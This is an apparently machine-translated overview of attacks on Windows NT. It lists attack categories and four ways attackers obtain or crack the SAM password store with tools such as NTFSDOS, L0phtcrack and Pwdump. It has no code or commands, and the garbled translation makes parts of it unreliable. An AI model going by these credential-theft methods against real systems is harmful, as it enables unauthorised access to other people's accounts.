Hackers attack Windows NT Knowledge Series Daquan

Typically, the attacker will take the form of attack on the NT:

1, guess passwords (guess solution manual, automatic guess solution, monitoring guess solution);

2, remote exploits (buffer overflows, denial of service DDos);

3, upgrade privileges (siphon information, modify the registry, Getadmin, Sechole, Trojan horses);

4, crack SAM file (for SAM, SAM software on crack);

5, looking for trust vulnerability (to change the registry key value);

6, remote monitoring (NetCat monitor, BO2000, WinVNC).

Here I would like to talk about the SAM file on the way to get general there are four:

1, the boot another operating system

As the name implies, if we do not directly start the NT system, and boot the server with another system, then, SAM file apparently lost its role in protection.Hackers often use the System Internals NTFSDOS the system drive the company to gain access to the NTFS permissions on the hard disk format, and then extract the SAM file.

2, access to the backup SAM

NT Repair Disk Utility in the backup system will be critical information, which of course includes the SAM file, rdisk in the% systemroot% repair SAM backup directory will be named SAM._ a Copy of a compression.The majority of the administrator after copying this information are generally forget to delete these files, which are left to the hackers could use it.Hackers generally choose to import finished L0phtcrack get the backup job.

3, derived from the SAM in the encrypted hash value

We mentioned how to get the Administrator access, with administrator privileges after the hacker can easily access to the NT SAM stored in the registry password hash.With our previously mentioned L0phcrack or Pwdump these tools can easily access to the encrypted value.But after patching the NT after a number of encryption performance to be strong.

4, NT Password Authentication exchange process monitoring

Here we have to mention L0phtcrack, it can be said L0phcrack the most powerful feature is available directly from the local network can sniff out the SMB server message block encrypted password hash value.